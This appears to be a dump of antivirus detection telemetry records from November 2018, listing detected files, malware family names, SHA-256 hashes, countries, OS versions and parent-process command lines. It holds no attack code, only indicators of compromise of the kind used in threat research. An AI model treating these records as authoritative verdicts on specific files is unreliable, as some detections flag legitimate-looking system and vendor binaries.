  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:20:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212015-21bb03bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61e0b237\\AVSCAN-20181104-211730-0E7E2092\\AVSCAN-20181104-212015-21BB03BF', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:20:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T19:26:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T18:30:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='saper.exe', filepath='D:\\Saper\\Saper.exe', filesize=896000, name='BDS/Hupigon.khxi.#M1.#R1'), hash='a883b670c9b5753f61478450b0f085a17d806088d9670199c5eb668f02b28baa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T21:16:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-04T23:49:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='smp2.exe', filepath='D:\\Documents and Settings\\X\\Application Data\\smp2.exe', filesize=512000, name='HEUR/AGEN.1004048.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline='Copy *\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\TeraCopy\\\\\\\\FileList.dat\\\\\\" \\\\\\"C:\\\\\\\\\\\\\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\TeraCopy\\TeraCopy.exe', parentsize=1243280, timestamp='2018-11-04T08:02:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160508-d76a050d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155558-81439129\\AVSCAN-20181104-160508-D76A050D', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T04:52:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001744-8eddcfdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001744-8EDDCFDB', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:47:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195835-1142583a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6048dd9\\AVSCAN-20181104-195732-0A9CA371\\AVSCAN-20181104-195835-1142583A', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T16:06:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151145-b65a3338', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d880bdd\\AVSCAN-20181104-151117-B1DD74DF\\AVSCAN-20181104-151145-B65A3338', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:39:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:14:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7e7b046bbaa73f9da5cfcdd320d96985481a13aef7f15b00fa4e44f7f7ab0421', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-3.available\\Avira\\7E7B046BBAA73F9DA5CFCDD320D96985481A13AEF7F15B00FA4E44F7F7AB0421', filesize=2048000, name='TR/Patched.Ren.Gen.#M300.#R3368'), hash='7e7b046bbaa73f9da5cfcdd320d96985481a13aef7f15b00fa4e44f7f7ab0421', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:30:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151848-5f87b714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-151831-5DDC5EFB\\AVSCAN-20181104-151848-5F87B714', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:19:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='00003460.exe', filepath='\\\\?\\D:\\KDR\\exe\\00003460.exe', filesize=320000, name='TR/Crypt.XPACK.Gen.#M300.#R2936'), hash='5a5e12f66cb63556f0d2b9f4b0deaa85acb3cd0221bfcc1067123124d9a5e9e5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:43:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003410.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{380D42AC-7531-4738-9953-A56FA241C116}\\RP1\\A0003410.exe', filesize=896000, name='W32/Sality.Y.#M1.#R1'), hash='a8c264f984797767707ff016bc9c9693998226b5df0c89e3098d84190be57fc8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:26:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='859fdf95109387e91dde4bcb0691c675fceb741dbcc512ac20ce2ee365b92c7d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:10:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0004765.exe', filepath='d:\\system volume information\\_restore{51d20475-b19b-4e6a-8fc3-a60e80bdc71c}\\rp12\\A0004765.exe', filesize=832000, name='W32/Neshta.A.#M1.#R1'), hash='b0fc84022365947788471d9efedd6ee0a593ee4030a2e5b9d8682aa6a6e9a205', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:39:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0027116.exe', filepath='D:\\System Volume Information\\_restore{0BEE0DD9-7CB5-4D18-97A2-E6F2B2544E0C}\\RP27\\A0027116.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='ab2e83b292f74e29b1bf2a45ec264aa8eccbf7026d00488cb01505a0281201c3', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001538-117cb8af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9757d9d4\\AVSCAN-20181105-001528-0FE6D9EF\\AVSCAN-20181105-001538-117CB8AF', filesize=8000, name='JS/ScrInject.ppsw.#M1.#R1'), hash='71d9f305c45d6b45f152d9224c4d1de65e863964d2804bceb3783a6f3d3b0a1a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:47:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203847-e751feb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3696609\\AVSCAN-20181104-193953-66E2BE01\\AVSCAN-20181104-203847-E751FEB7', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='thunderbird setup 52.1.1 english.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\Thunderbird Setup 52.1.1 English.exe', filesize=100000, name='W32/Sality.#M1.#R1'), hash='24a34583d74e7de4262d8b6e8c50f4526de43b5042386c4bf87ff98e19a28e0e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:26:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T13:33:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-181406-5897d650', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0600103a\\AVSCAN-20181104-174558-3841EEBB\\AVSCAN-20181104-181406-5897D650', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='689f8d95752084794c09edc4d7e50c7347428fee74c9a37327343f1a517cdcd6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T16:56:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140244-f1647eb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140244-F1647EB5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201150-9353c809', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cad85403\\AVSCAN-20181104-193303-4F088A0E\\AVSCAN-20181104-201150-9353C809', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='6d381533e89cbe6e42550aaf5fc035cd536fc6f116cb57a6fe7ea7b5499aba9d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205529-264e2682', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205529-264E2682', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:55:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1a01b19a.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1a01b19a.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000082a', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp0000082a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130348-4f568eb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-130348-4F568EB9', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:03:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-000426-95a0004b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ad41a130\\AVSCAN-20181103-000358-84F77EDA\\AVSCAN-20181103-000426-95A0004B', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:04:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usa.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\LANGUAGE\\USA\\USA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pmc01015.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\PMC01015.exe', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='8b41cda8d6482a0e2aca27f0fb0b07af12ca04d6688365f245de7ca2da27aec4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:59:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='workpanel.exe', filepath='G:\\上環機-3\\軟式操作盤\\WorkPanel.exe', filesize=2560000, name='W32/Jadtre.K.#M1.#R1'), hash='75d6102ddffe6cbd11af718876170ce8e0937cff902d448324cb68b9a31dc45a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='C:\\AdwCleaner\\Quarantine\\C\\Users\\Arzani\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9a433500a68682e31adc76345d0965a53ff6c930f059fe6a910a3bbbdf7242d9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=22216, timestamp='2018-11-02T07:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195552-a34d1349', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_001e0289\\AVSCAN-20181102-194148-54DD84AC\\AVSCAN-20181102-195552-A34D1349', filesize=1020000, name='PUA/MyPCBackup.#M1.#R1'), hash='d55b192248c695cc763c8c5bd5a3d40aa91842a57756cc2ab3150227bcd41030', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='partitionfindandmount.exe', filepath='H:\\HBCD\\Programs\\PARTITIONFINDANDMOUNT.EXE', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='system volume information.exe', filepath='j:\\system volume information\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='BJ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath='H:\\HBCD\\Programs\\PRINTQUEUECLEANER.EXE', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658e85', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658e85', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110552-e4c77291', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110552-E4C77291', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='akylwbtc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\AkylWbTC.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\82F026D9819428812A413F681F78D01F180017D6CC6F7040911A40FEEDDBCF69', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b96f3ac72ebf1f321d68ff77d0c330d1bb7b971edc60522ee141aaa4d12e63e1.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B96F3AC72EBF1F321D68FF77D0C330D1BB7B971EDC60522EE141AAA4D12E63E1.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b96f3ac72ebf1f321d68ff77d0c330d1bb7b971edc60522ee141aaa4d12e63e1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:54:09Z'), dt=datetime.date(2018, 11, 2)),
